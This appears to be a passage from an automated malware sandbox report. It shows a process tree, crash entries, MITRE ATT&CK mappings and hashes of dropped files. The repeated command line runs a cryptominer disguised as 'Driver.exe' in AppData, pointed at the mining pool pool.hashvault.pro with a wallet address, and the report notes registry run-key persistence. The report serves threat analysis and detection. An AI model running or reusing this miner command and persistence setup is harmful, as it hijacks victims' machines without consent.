        6⤵
        
        PID:3680
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4184
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:716
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4388
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:5024
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:384
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3092
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:720
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:908
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3104
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4808
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3168
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4520
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4056
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:1512
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2888
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:1064
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:1428
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:836
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:2640
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3584
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3576
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:1992
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3116
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:788
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:5088
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:1220
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:2012
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:408
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4224
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:2060
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4384
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:1472
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:5032
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3384
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:2164
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4712
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4040
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:456
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:3688
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:1796
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:2464
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4640
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:4372
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:1736
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:1432
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 8AjRQPGQfFaMQL4ZNtmz6fSqpNdYZhUVsJxcZC7uiYmi1L5vQpeQr4nGu433wELAERYfH6BsSVBgKSnZcCdKHeYr4Cpj4ja -p x -k -v=0 --donate-level=1 -t 4
        5⤵
        
        PID:752

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 380 -p 4932 -ip 4932
1⤵
PID:2484

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 504 -p 2284 -ip 2284
1⤵
PID:400

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 3136 -ip 3136
1⤵
PID:1424

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 476 -p 2888 -ip 2888
1⤵
PID:4276

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 5016 -ip 5016
1⤵
PID:2284

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 476 -p 556 -ip 556
1⤵
PID:3720

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 524 -p 720 -ip 720
1⤵
PID:3644

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 908 -ip 908
1⤵
PID:4776

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 508 -p 1428 -ip 1428
1⤵
PID:816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat

Filesize
37B

MD5
28151380c82f5de81c1323171201e013

SHA1
ae515d813ba2b17c8c5ebdae196663dc81c26d3c

SHA256
bb8582ce28db923f243c8d7a3f2eccb0ed25930f5b5c94133af8eefb57a8231d

SHA512
46b29cba0dc813de0c58d2d83dc298fa677921fd1f19f41e2ed3c7909c497fab2236d10a9ae59b3f38e49cf167964ede45e15543673a1e0843266242b8e26253

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe

Filesize
4.4MB

MD5
638dec887f2509a5cf5b14b54f537090

SHA1
1dcffcea58044f5f899ada8a50c9d702d96762fb

SHA256
d39995aa446861b523a59675c685ef3c144cdf872b734325b77118bedaf1b8c3

SHA512
76757e27c28b518b04dc90168e1bcf2c65d876a8f0747679d94c152200b7d7d35852bc38681a2d84f0100d394bf1e087aed243a9359b0ce08d719ed44b4fb555

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\poldawr.exe

Filesize
4.0MB

MD5
9eeeab9a8e8a28fb1f293a89f16f7c47

SHA1
47bb11577a5e26c5361981c13a3f14d3a8a9d29d

SHA256
5d3f2718aa12bf295540debe06aba1634bd1a22a6dbec4acec16dad34508c9cf

SHA512
338fe11bfca57e59a0718a160b9233cbedcdd6cf670fa82b3ed9bd11c593acb0bc11184f4884470302ac715c3ef98d63528a46e11765febcd2a84515f4594d91

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
memory/484-94-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1004-73-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1188-118-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1320-48-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1428-91-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1640-127-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1796-38-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1796-37-0x0000000000570000-0x0000000000584000-memory.dmp

Filesize
80KB

Download
memory/1796-35-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1888-88-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2056-133-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2164-52-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2188-136-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2216-41-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2480-115-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2484-64-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2584-79-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2644-100-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2884-85-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3004-112-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3096-121-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3580-124-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3708-76-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3724-130-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3808-45-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3904-67-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3956-25-0x00000000059B0000-0x0000000005A16000-memory.dmp

Filesize
408KB

Download
memory/3956-22-0x0000000000820000-0x0000000000C1E000-memory.dmp

Filesize
4.0MB

Download
memory/4040-109-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4404-106-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4688-70-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4720-97-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4756-56-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4804-82-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-103-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-60-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download